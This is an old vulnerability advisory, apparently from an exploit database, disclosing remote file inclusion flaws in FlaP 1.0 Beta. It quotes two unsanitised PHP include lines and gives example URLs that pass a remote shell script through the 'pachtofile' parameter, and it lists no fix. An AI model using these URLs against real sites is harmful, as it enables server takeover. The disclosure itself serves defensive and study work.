FlaP 1.0b (pachtofile) Remote File Inclusion Vulnerabilities

2007-05-25 00:00:00

##############################################################################################
# FlaP v.1.0. Beta <= Remote File Inclusion Vulnerability #
# #

# #
##############################################################################################
#Vuln Code #

# #
#ERROR1:skin/html/table.php #
# #

# <? include "$pachtofile/left_menu.php"; <<< RFI CODE #
# #

# #
#BUG1: #
# #

#Example1:http://victim.com/path/skin/html/table.php?pachtofile=[[Sh3LL Script]] #
##############################################################################################

# #
#ERROR2:login.php #
# #

#<? include "$pachtofile/right_menu.php"; ?></ <<< RFI CODE #
# #

# #
#BUG2: #
# #

#Example1:http://victim.com/path/login.php?pachtofile=[[Sh3LL Script]] #
##############################################################################################


##############################################################################################
# #
#Script Download #

##############################################################################################
# #
#http://scripts.protoplex.ru/scripts_show/1854.html #

# #
##############################################################################################
# #

#Cyber-Security #
# #
##############################################################################################

#

Fixes

No fixes

In order to submit a new fix you need to be registered.